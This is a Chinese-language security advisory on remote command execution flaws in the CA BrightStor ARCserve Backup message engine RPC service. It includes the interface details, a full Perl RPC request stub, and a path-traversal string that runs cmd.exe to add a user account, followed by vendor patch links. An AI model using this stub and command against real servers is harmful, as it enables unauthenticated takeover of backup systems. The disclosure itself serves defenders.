发布日期：2008-10-09
更新日期：2008-10-13

受影响系统：

Computer Associates BrightStor ARCserve Backup R12.0
Computer Associates BrightStor ARCserve Backup R11.5
Computer Associates BrightStor ARCserve Backup R11.1
Computer Associates Server Protection r2
Computer Associates Business Protection r2

描述：

---

BUGTRAQ  ID: 31684
CVE(CAN) ID: CVE-2008-4397,CVE-2008-4398,CVE-2008-4399,CVE-2008-4400

BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。

CA BrightStor消息引擎服务（msgeng.exe）注册了一个RPC接口：

    UUID：506b1890-14c8-11d1-bbc3-00805fa6962e
    版本：1.0
    监听端口：6504

用户可以通过ncacn_ip_tcp匿名访问这个接口。以下是opnum 0x10A的函数IDL：

    /* opcode: 0x156, address: 0x28EB1C00 */
    long   sub_28EB1C00 (
     [in] handle_t  arg_1,
     [in][string] char * arg_2,
     [in][string] char * arg_3,
     [in][string] char * arg_4,
     [in][string] char * arg_5,
     [in] long  arg_6,
     [in][size_is(arg_1)] char * arg_7,
     [in] long  arg_8,
     [in, out] long * arg_9,
     [out][size_is(*arg_9)] char ** arg_10
    );

以下是这个函数正常的数据子项：

    my $stub=
    "\x10\x00\x00\x00\x00\x00\x00\x00".        #should equal to remote computer name
    "\x10\x00\x00\x00".
    "kkk-49ade5b31c1".
    "\x00".

    "\x08\x00\x00\x00\x00\x00\x00\x00".        #will run "aaa.exe"
    "\x08\x00\x00\x00".                
    "aaa.exe"
    "\x00".


    "\x81\x00\x00\x00\x00\x00\x00\x00".        #arg_4
    "\x81\x00\x00\x00".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "BBBBBBBBBBBBBBBB".
    "\x00\x00\x00\x00".

    "\x01\x00\x00\x00".                #arg_5
    "\x00\x00\x00\x00".
    "\x01\x00\x00\x00".
    "\x00\x00\x00\x00".
    
    "\xce\x00\x00\x00".                #arg_6
    "\xce\x00\x00\x00".

    "\xff\xfe\x3c\x00\x3f\x00\x78\x00".
    "\x6d\x00\x6c\x00\x20\x00\x76\x00\x65\x00\x72\x00\x73\x00\x69\x00".
    "\x6f\x00\x6e\x00\x3d\x00\x22\x00\x31\x00\x2e\x00\x30\x00\x22\x00".
    "\x3f\x00\x3e\x00\x0d\x00\x0a\x00\x3c\x00\x52\x00\x45\x00\x50\x00".
    "\x4f\x00\x52\x00\x54\x00\x3e\x00\x0d\x00\x0a\x00\x20\x00\x3c\x00".
    "\x48\x00\x45\x00\x41\x00\x44\x00\x45\x00\x52\x00\x20\x00\x44\x00".
    "\x61\x00\x74\x00\x65\x00\x3d\x00\x22\x00\x79\x00\x65\x00\x73\x00".
    "\x22\x00\x3e\x00\x0d\x00\x0a\x00\x3c\x00\x54\x00\x49\x00\x54\x00".
    "\x4c\x00\x45\x00\x3e\x00\xcf\x6b\xe5\x65\x07\x59\xfd\x4e\xb6\x72".
    "\x01\x60\xa5\x62\x68\x88\x3c\x00\x2f\x00\x54\x00\x49\x00\x54\x00".
    "\x4c\x00\x45\x00\x3e\x00\x0d\x00\x0a\x00\x3c\x00\x44\x00\x45\x00".
    "\x53\x00\x43\x00\x52\x00\x3e\x00\x28\x57\x4d\x52\x20\x00\x32\x00".
    "\x34\x00\x20\x00\x0f\x5c\xf6\x65\x85\x51\x8c\x5b\x10\x62\x84\x76".
    "\x07\x59\xfd\x4e\x5c\x4f\x00\x00\x00\x00\x00\x00\xde\x77\x00\x00";

首先，第一个参数（受害用户的计算机名）应等于真正的计算机名；其次，将aaa.exe字符串更改为../aaa.exe就可以绕过当前目录，如果程序默认安装的话以下字符串可以到达cmd.exe并在受害系统上添加CCC/ZZZ（用户名/口令）用户：

    ../../../../../../../..//winnt//system32//cmd.exe /c \"net user CCC ZZZ /add\" ||

此外如果用户向磁带引擎服务、数据库引擎服务和认证服务提交了恶意请求的话，还可能导致这些服务崩溃。

<*来源：Haifei Li
        Greg Linares （glinares.code@gmail.com）
  
  链接：http://secunia.com/advisories/32220/
        http://marc.info/?l=full-disclosure&m=122368775104331&w=2
        http://marc.info/?l=full-disclosure&m=122359034413624&w=2
*>

建议：

---

厂商补丁：

Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=RO02398
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=RO01340

浏览次数：2522
严重程度：0（网友投票）